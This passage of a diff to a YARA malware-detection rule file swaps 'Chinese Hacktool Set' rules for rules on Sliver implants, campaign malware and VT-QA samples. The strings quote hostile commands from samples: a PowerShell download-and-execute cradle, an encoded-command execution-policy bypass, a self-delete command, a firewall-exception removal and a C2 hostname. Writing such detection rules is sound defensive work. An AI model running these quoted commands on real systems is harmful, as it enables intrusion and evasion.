+		hash1 = "c5bfb5118a999d21e9f445ad6ccb08eb71bc7bd4de9e88a41be9cf732156c525"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 140KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and pe.imphash ( ) == "fb7da233a35ac523d6059fff543627ab"
 }
-rule SIGNATURE_BASE_Ms10048_X64 : FILE
+rule SIGNATURE_BASE_ME_Campaign_Malware_5 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file ms10048-x64.exe"
+		description = "Detects malware from Middle Eastern campaign reported by Talos"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8c9bcf72-1bc7-57ed-9e0b-09d113a8c704"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2362-L2378"
+		id = "241a4236-2688-5920-87f7-eed33963ec60"
+		date = "2018-02-07"
+		modified = "2022-08-18"
+		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_middle_east_talosreport.yar#L81-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "418bec3493c85e3490e400ecaff5a7760c17a0d0"
-		logic_hash = "f6e353a9e4f751632ca5fda1663f0ba66b16b60df90570ccdaf836eaaa6a78ca"
+		logic_hash = "b958a09be09de03e702a0653cf51148698b35c29bed90edbc3a65e485f0c3aa6"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d49e9fdfdce1e93615c406ae13ac5f6f68fb7e321ed4f275f328ac8146dd0fc1"
+		hash2 = "e66af059f37bdd35056d1bb6a1ba3695fc5ce333dc96b5a7d7cc9167e32571c5"
 
 	strings:
-		$s1 = "The target is most likely patched." fullword ascii
-		$s2 = "Dojibiron by Ronald Huizer, (c) master#h4cker.us  " fullword ascii
-		$s3 = "[ ] Creating evil window" fullword ascii
-		$s4 = "[+] Set to %d exploit half succeeded" fullword ascii
+		$s1 = "D:\\me\\do\\do\\obj\\" ascii
+		$s2 = "Select * from Win32_ComputerSystem" fullword wide
+		$s3 = "Get_Antivirus" fullword ascii
+		$s4 = "{{\"id\":\"{0}\",\"user\":\"{1}\",\"path\":\"{2}\"}}" fullword wide
+		$s5 = "update software online" fullword wide
+		$s6 = "time.nist.gov" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and 5 of them or all of them
 }
-rule SIGNATURE_BASE_Hscangui : FILE
+
+rule SIGNATURE_BASE_Sliver_Implant_32Bit_1
 {
 	meta:
-		description = "Chinese Hacktool Set - file hscangui.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f0993510-70ee-52c6-a7b8-e023eb4b33ee"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2380-L2396"
+		description = "Sliver 32-bit implant (with and without --debug flag at compile)"
+		author = "gssincla@google.com"
+		id = "6bc4d7d1-64cf-5920-8f07-54a8a7a94f26"
+		date = "2022-11-18"
+		modified = "2025-03-21"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_gcti_sliver.yar#L26-L94"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "af8aced0a78e1181f4c307c78402481a589f8d07"
-		logic_hash = "9c0eb87dcf8aa107b5289d196650aebcf49c24f57a317de0afdadd61fb5bb5b7"
+		hash = "911f4106350871ddb1396410d36f2d2eadac1166397e28a553b28678543a9357"
+		logic_hash = "3fec6fbba86a24b395e58f02fb35a60b1b9a4b941b4d85c060cc6159c6aa8265"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s1 = "[%s]: Found \"FTP account: anyone/anyone@any.net\"  !!!" fullword ascii
-		$s2 = "http://www.cnhonker.com" fullword ascii
-		$s3 = "%s@ftpscan#Cracked account:  %s/%s" fullword ascii
-		$s4 = "[%s]: Found \"FTP account: %s/%s\" !!!" fullword ascii
+		tags = ""
+
+	strings:
+		$s_tcppivot = { 81 ?? 74 63 70 70 [2-20] 81 ?? 04 69 76 6F 74  }
+		$s_wg = { 66 81 ?? 77 67 }
+		$s_dns = { 66 81 ?? 64 6E [2-20] 80 ?? 02 73 }
+		$s_http = { 81 ?? 68 74 74 70 }
+		$s_https = { 81 ?? 68 74 74 70 [2-20] 80 ?? 04 73 }
+		$s_mtls = { 81 ?? 6D 74 6C 73 }
+		$fp1 = "cloudfoundry" ascii fullword
+		$fp2 = "googleapi.Error" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 220KB and 2 of them
+		4 of ( $s* ) and not 1 of ( $fp* ) and not pe.number_of_signatures > 0
 }
-rule SIGNATURE_BASE_Goodtoolset_Ms11080 : FILE
+
+rule SIGNATURE_BASE_Sliver_Implant_64Bit_1
 {
 	meta:
-		description = "Chinese Hacktool Set - file ms11080.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "080e04a3-5cbe-57a8-9106-539451922cb4"
-		date = "2015-06-13"
-		modified = "2022-12-21"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2398-L2417"
+		description = "Sliver 64-bit implant (with and without --debug flag at compile)"
+		author = "gssincla@google.com"
+		id = "b84db933-0e11-5871-821d-43697c015665"
+		date = "2022-11-18"
+		modified = "2025-03-21"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_gcti_sliver.yar#L112-L183"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f0854c49eddf807f3a7381d3b20f9af4a3024e9f"
-		logic_hash = "a5b03dded6146dae48bca962e7c5419c2ea69f8709ae7f2c9355bd178d5d77fb"
+		hash = "2d1c9de42942a16c88a042f307f0ace215cdc67241432e1152080870fe95ea87"
+		logic_hash = "ccfd944a5bc6521c89d44572910e2998e2404d472a593f9d97224d606d247bcd"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "[*] command add user 90sec 90sec" fullword ascii
-		$s2 = "\\ms11080\\Debug\\ms11080.pdb" ascii
-		$s3 = "[>] by:Mer4en7y@90sec.org" fullword ascii
-		$s4 = "[*] Add to Administrators success" fullword ascii
-		$s5 = "[*] User has been successfully added" fullword ascii
-		$s6 = "[>] ms11-08 Exploit" fullword ascii
+		$s_tcppivot = { 48 ?? 74 63 70 70 69 76 6F 74 }
+		$s_namedpipe = { 48 ?? 6E 61 6D 65 64 70 69 70 [2-32] 80 ?? 08 65 }
+		$s_https = { 81 ?? 68 74 74 70 [2-32] 80 ?? 04 73 }
+		$s_wg = {66 81 ?? 77 67}
+		$s_dns = { 66 81 ?? 64 6E [2-20] 80 ?? 02 73 }
+		$s_mtls = {  81 ?? 6D 74 6C 73  }
+		$fp1 = "cloudfoundry" ascii fullword
+		$fp2 = "googleapi.Error" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 240KB and 2 of them
+		5 of ( $s* ) and not 1 of ( $fp* ) and not pe.number_of_signatures > 0
 }
-rule SIGNATURE_BASE_Epathobj_Exp64 : FILE
+rule SIGNATURE_BASE_Malware_QA_Not_Copy : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file epathobj_exp64.exe"
+		description = "VT Research QA uploaded malware - file not copy.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cb56bbdc-8afa-5b4b-b7df-942dd3d60366"
-		date = "2015-06-13"
-		modified = "2022-12-21"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2419-L2438"
+		id = "d618389b-ec80-5ad1-be44-4b1f3e36c07d"
+		date = "2016-08-29"
+		modified = "2023-12-05"
+		reference = "VT Research QA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_malware_set_qa.yar#L13-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "09195ba4e25ccce35c188657957c0f2c6a61d083"
-		logic_hash = "dc4073a7d319cffbbce7b3c7b7cf02b007839b72fe14ec1fbdcd3343d57cf7bf"
-		score = 75
+		logic_hash = "4001d71101a9c6d4134e7ed4b9b03d34ada62241a668970e21a60d7a23dd7b86"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1410f38498567b64a4b984c69fe4f2859421e4ac598b9750d8f703f1d209f836"
 
 	strings:
-		$s1 = "Watchdog thread %d waiting on Mutex" fullword ascii
-		$s2 = "Exploit ok run command" fullword ascii
-		$s3 = "\\epathobj_exp\\x64\\Release\\epathobj_exp.pdb" ascii
-		$s4 = "Alllocated userspace PATHRECORD () %p" fullword ascii
-		$s5 = "Mutex object did not timeout, list not patched" fullword ascii
-		$s6 = "- inconsistent onexit begin-end variables" fullword wide
+		$x1 = "U2VydmVyLmV4ZQ==" fullword wide
+		$x2 = "\\not copy\\obj\\Debug\\not copy.pdb" ascii
+		$x3 = "fuckyou888.ddns.net" fullword wide
+		$s1 = "cmd.exe /c ping 0 -n 2 & del \"" fullword wide
+		$s2 = "Server.exe" fullword wide
+		$s3 = "Execute ERROR" fullword wide
+		$s4 = "not copy.exe" fullword wide
+		$s5 = "Non HosT" fullword wide
+		$s6 = "netsh firewall delete allowedprogram" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_Kelloworld_2 : FILE
+rule SIGNATURE_BASE_Malware_QA_Update : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file kelloworld.dll"
+		description = "VT Research QA uploaded malware - file update.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3f298004-e618-5f4a-9cd7-c7c954b6fc64"
-		date = "2015-06-13"
+		id = "1dce684d-33b0-5588-8325-2a34c0cde32f"
+		date = "2016-08-29"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2440-L2455"
+		reference = "VT Research QA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_malware_set_qa.yar#L39-L69"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"
-		logic_hash = "a575c30c06bd84196cbf01a9b5ef3a042cf29553610421b019227d30a2c7ad1c"
-		score = 75
+		logic_hash = "97e0fec7bb4ebf326b449cc0d65eb9f024b33e1d2e54c6d3893164b66c024b2a"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541"
+		hash2 = "6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e"
 
 	strings:
-		$s1 = "Hello World!" fullword wide
-		$s2 = "kelloworld.dll" fullword ascii
-		$s3 = "kelloworld de mimikatz pour Windows" fullword wide
+		$x1 = "UnActiveOfflineKeylogger" fullword ascii
+		$x2 = "BTRESULTDownload File|Mass Download : File Downloaded , Executing new one in temp dir...|" fullword ascii
+		$x3 = "ActiveOnlineKeylogger" fullword ascii
+		$x4 = "C:\\Users\\DarkCoderSc\\" ascii
+		$x5 = "Celesty Binder\\Stub\\STATIC\\Stub.pdb" ascii
+		$x6 = "BTRESULTUpdate from URL|Update : File Downloaded , Executing new one in temp dir...|" fullword ascii
+		$s1 = "MSRSAAP.EXE" fullword wide
+		$s2 = "Command successfully executed!|" fullword ascii
+		$s3 = "BTMemoryLoadLibary: Get DLLEntyPoint failed" fullword ascii
+		$s4 = "I wasn't able to open the hosts file, maybe because UAC is enabled in remote computer!" fullword ascii
+		$s5 = "\\Internet Explorer\\iexplore.exe" ascii
+		$s6 = "ping 127.0.0.1 -n 4 > NUL && \"" fullword ascii
+		$s7 = "BTMemoryGetProcAddress: DLL doesn't export anything" fullword ascii
+		$s8 = "POST /index.php/1.0" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Hscan_V1_20_Hscan : FILE
+rule SIGNATURE_BASE_Malware_QA_Tls : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file hscan.exe"
+		description = "VT Research QA uploaded malware - file tls.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4183824c-b77f-5500-a962-8d9dc78a9388"
-		date = "2015-06-13"
+		id = "b3b654b1-73cf-5e04-a332-34777f646a66"
+		date = "2016-08-29"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2457-L2474"
+		reference = "VT Research QA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_malware_set_qa.yar#L71-L87"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "568b06696ea0270ee1a744a5ac16418c8dacde1c"
-		logic_hash = "8e30c366c5d5c34a7b50ba4dec17a46c173196b773fff6965891802bcebeb112"
-		score = 75
+		logic_hash = "20c849d8c60acd77a28244c7ebcbb2f96b233e74af6c52112a0c828e1de2ed84"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f06d1f2bee2eb6590afbfa7f011ceba9bd91ba31cdc721bc728e13b547ac9370"
 
 	strings:
-		$s1 = "[%s]: Found \"FTP account: anyone/anyone@any.net\"  !!!" fullword ascii
-		$s2 = "%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,100" fullword ascii
-		$s3 = ".\\report\\%s-%s.html" fullword ascii
-		$s4 = ".\\log\\Hscan.log" fullword ascii
-		$s5 = "[%s]: Found cisco Enable password: %s !!!" fullword ascii
+		$s1 = "\\funoverip\\ultimate-payload-template1\\" ascii
+		$s2 = "ULTIMATEPAYLOADTEMPLATE1" fullword wide
+		$s3 = "ultimate-payload-template1" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE__Project1_Generate_Rejoice : FILE
+rule SIGNATURE_BASE_Malware_QA_Get_The_Fucking_IP : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - from files Project1.exe, Generate.exe, rejoice.exe"
+		description = "VT Research QA uploaded malware - file get The FucKinG IP.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4b36d450-1194-527c-8565-7f321d486d01"
-		date = "2015-06-13"
+		id = "1c992fc5-79cf-532c-a18b-cfcc3406d6ed"
+		date = "2016-08-29"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2476-L2497"
+		reference = "VT Research QA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_malware_set_qa.yar#L89-L107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b66bb4d392881468b33a8ee4458f33bfe7a82d34cc3927eedccd54ad94ff6a04"
-		score = 75
+		logic_hash = "ab6a60142ef0e7a6e079a1b62da0b962dc3b59584b785516e93c74669574a81b"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "d1a5e3b646a16a7fcccf03759bd0f96480111c96"
-		hash1 = "2cb4c3916271868c30c7b4598da697f59e9c7a12"
-		hash2 = "fe634a9f5d48d5c64c8f8bfd59ac7d8965d8f372"
+		hash1 = "7b2c04e384919075be96e3412d92c14fc1165d1bc7556fd207488959c5c4d2f7"
 
 	strings:
-		$s1 = "sfUserAppDataRoaming" fullword ascii
-		$s2 = "$TRzFrameControllerPropertyConnection" fullword ascii
-		$s3 = "delphi32.exe" fullword ascii
-		$s4 = "hkeyCurrentUser" fullword ascii
-		$s5 = "%s is not a valid IP address." fullword wide
-		$s6 = "Citadel hooking error" fullword ascii
+		$x1 = "C:\\Users\\Mdram ahmed\\AppData"
+		$x2 = "\\Local\\Temporary Projects\\get The FucKinG IP\\" ascii
+		$x3 = "get The FucKinG IP.exe" fullword wide
+		$x4 = "get ip by mdr3m" fullword wide
+		$x5 = "MDR3M kik: Mdr3mhm" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of ( $x* ) ) or ( 2 of them )
 }
-rule SIGNATURE_BASE__Hscan_Hscan_Hscangui : FILE
+rule SIGNATURE_BASE_Malware_QA_Vqgk : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - from files hscan.exe, hscan.exe, hscangui.exe"
+		description = "VT Research QA uploaded malware - file vqgk.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "174b0ee4-23ce-59fd-a784-ab58fd13ce67"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2499-L2519"
+		id = "9246d9de-92e5-5cb8-857c-1e222c3d74d5"
+		date = "2016-08-29"
+		modified = "2022-12-21"
+		reference = "VT Research QA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_malware_set_qa.yar#L109-L137"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5466c3dd8b2b777186bfab9d0948905eb3692ce05cf4748fb5b7b896dc3cb251"
-		score = 75
+		logic_hash = "19b7099cdb8a984f1ba6cf88024db398a81ac4f4bf3c16cac40c5ee0e5b465fd"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "17a743e40790985ececf5c66eaad2a1f8c4cffe8"
-		hash1 = "568b06696ea0270ee1a744a5ac16418c8dacde1c"
-		hash2 = "af8aced0a78e1181f4c307c78402481a589f8d07"
+		hash1 = "99541ab28fc3328e25723607df4b0d9ea0a1af31b58e2da07eff9f15c4e6565c"
 
 	strings:
-		$s1 = ".\\log\\Hscan.log" fullword ascii
-		$s2 = ".\\report\\%s-%s.html" fullword ascii
-		$s3 = "[%s]: checking \"FTP account: ftp/ftp@ftp.net\" ..." fullword ascii
-		$s4 = "[%s]: IPC NULL session connection success !!!" fullword ascii
-		$s5 = "Scan %d targets,use %4.1f minutes" fullword ascii
+		$x1 = "Z:\\devcenter\\aggressor\\external" ascii
+		$x2 = "\\beacon\\Release\\beacon.pdb" ascii
+		$x3 = "%d is an x86 process (can't inject x64 content)" fullword ascii
+		$x4 = "%d is an x64 process (can't inject x86 content)" fullword ascii
+		$s1 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
+		$s2 = "Could not open process token: %d (%u)" fullword ascii
+		$s3 = "\\\\%s\\pipe\\msagent_%x" fullword ascii
+		$s4 = "\\sysnative\\rundll32.exe" ascii
+		$s5 = "Failed to impersonate logged on user %d (%u)" fullword ascii
+		$s6 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" fullword ascii
+		$s7 = "could not write to process memory: %d" fullword ascii
+		$s8 = "beacon.dll" fullword ascii
+		$s9 = "Failed to impersonate token from %d (%u)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 240KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 5 of ( $s* ) ) ) or ( 7 of them )
 }
-rule SIGNATURE_BASE_Kiwi_Tools : FILE
+rule SIGNATURE_BASE_Malware_QA_1177 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set"
+		description = "VT Research QA uploaded malware - file 1177.vbs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "000f0081-b035-5c73-8da2-addde2b55303"
-		date = "2015-06-13"
+		id = "363228c1-f9f8-5319-91b2-7eabdd1ca3f8"
+		date = "2016-08-29"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2521-L2554"
+		reference = "VT Research QA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_malware_set_qa.yar#L139-L161"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ce7b3c7d57740257013d9d589444a3b53e81254619bd3f09ece917c70bba03ce"
-		score = 75
-		quality = 85
+		logic_hash = "0fa8e6c048bcc51553e8078a71416013696dd937c1508cd636873eab56c3797f"
+		score = 80
+		quality = 81
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "e57e79f190f8a24ca911e6c7e008743480c08553"
-		hash1 = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"
-		hash2 = "7ac7541e20af7755b7d8141c5c1b7432465cabd8"
-		hash3 = "9fbfe3eb49d67347ab57ae743f7542864bc06de6"
-		hash4 = "5c90d648c414bdafb549291f95fe6f27c0c9b5ec"
-		hash5 = "7addce4434670927c4efaa560524680ba2871d17"
-		hash6 = "28c5c0bdb7786dc2771672a2c275be7d9b742ec7"
-		hash7 = "b5c93489a1b62181594d0fb08cc510d947353bc8"
-		hash8 = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5"
-		hash9 = "5d578df9a71670aa832d1cd63379e6162564fb6b"
-		hash10 = "febadc01a64a071816eac61a85418711debaf233"
-		hash11 = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86"
-		hash12 = "56a61c808b311e2225849d195bbeb69733efe49a"
-		hash13 = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16"
-		hash14 = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc"
-		hash15 = "f661d6516d081c37ab7da0f4ec21b2cc6a9257c6"
-		hash16 = "20facf1fa2d87cccf177403ca1a7852128a9a0ab"
-		hash17 = "6e0ffa472d63fdda5abc4c1b164ba8724dcb25b5"
+		hash1 = "ff3a2740330a6cbae7888e7066942b53015728c367cf9725e840af5b2a3fa247"
 
 	strings:
-		$s1 = "http://blog.gentilkiwi.com/mimikatz" ascii
-		$s2 = "Benjamin Delpy" fullword ascii
-		$s3 = "GlobalSign" fullword ascii
+		$x1 = ".specialfolders (\"startup\") & \"\\ServerName.EXE\"" fullword ascii
+		$x2 = "expandenvironmentstrings(\"%%InsallDir%%\") " ascii
+		$s1 = "CreateObject(\"WScript.Shell\").Run(" ascii
+		$s2 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAA" ascii
+		$s3 = "cial Thank's to Dev-point.com" fullword ascii
+		$s4 = ".createElement(\"tmp\")" fullword ascii
+		$s5 = "'%CopyToStartUp%" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		( uint16( 0 ) == 0x4d27 and filesize < 100KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_Kiwi_Tools_Gentil_Kiwi : FILE
+rule SIGNATURE_BASE_Windivert_Driver : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set"
+		description = "Detects WinDivert User-Mode packet capturing driver"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4ad54580-b10b-5b17-8d8a-510e210e04d1"
-		date = "2015-06-13"
+		id = "95e89577-bb5a-5391-9130-155746d4783f"
+		date = "2017-10-02"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2556-L2587"
+		reference = "https://www.reqrypt.org/windivert.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_pua.yar#L1-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1a88bb31e985ae2119b578494ce9130204b41eece5929865c0822cdc82eaba75"
-		score = 75
+		logic_hash = "db2933396e015e906114bd04f75a5b5caf0564494224f533a6e00c1fa5421568"
+		score = 40
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "e57e79f190f8a24ca911e6c7e008743480c08553"
-		hash1 = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"
-		hash2 = "7ac7541e20af7755b7d8141c5c1b7432465cabd8"
-		hash3 = "9fbfe3eb49d67347ab57ae743f7542864bc06de6"
-		hash4 = "5c90d648c414bdafb549291f95fe6f27c0c9b5ec"
-		hash5 = "7addce4434670927c4efaa560524680ba2871d17"
-		hash6 = "28c5c0bdb7786dc2771672a2c275be7d9b742ec7"
-		hash7 = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5"
-		hash8 = "5d578df9a71670aa832d1cd63379e6162564fb6b"
-		hash9 = "febadc01a64a071816eac61a85418711debaf233"
-		hash10 = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86"
-		hash11 = "56a61c808b311e2225849d195bbeb69733efe49a"
-		hash12 = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16"
-		hash13 = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc"
-		hash14 = "f661d6516d081c37ab7da0f4ec21b2cc6a9257c6"
-		hash15 = "6e0ffa472d63fdda5abc4c1b164ba8724dcb25b5"
+		hash1 = "33c657fa27b92cfcced66b331cfea7a880460a98cf037e4277faa1420fe59d1c"
+		hash2 = "9b834e8f9d117bf2c564a37434973dc0717270ebfac8d8251711905d18da3858"
+		hash3 = "5ef707ea68a9bd3a3e568793a0f7d66d166694801ada067d9ebac1d13e53153e"
+		hash4 = "df12afa691e529f01c75b3dd734f6b45bf1488dbf90ced218657f0d205bff319"
 
 	strings:
-		$s1 = "mimikatz" fullword wide
-		$s2 = "Copyright (C) 2012 Gentil Kiwi" fullword wide
-		$s3 = "Gentil Kiwi" fullword wide
+		$s1 = "WinDivertDllEntry" fullword ascii
+		$s2 = "WinDivertHelperParseIPv4Address" fullword ascii
+		$s3 = "WinDivert (web: http://reqrypt.org/windivert.html)" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of them )
 }
-
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_1 : FILE
+rule SIGNATURE_BASE_SUSP_Macro_Staroffice : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9f8a6831-172b-5310-9763-43657b79b91d"
-		date = "2018-05-04"
-		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
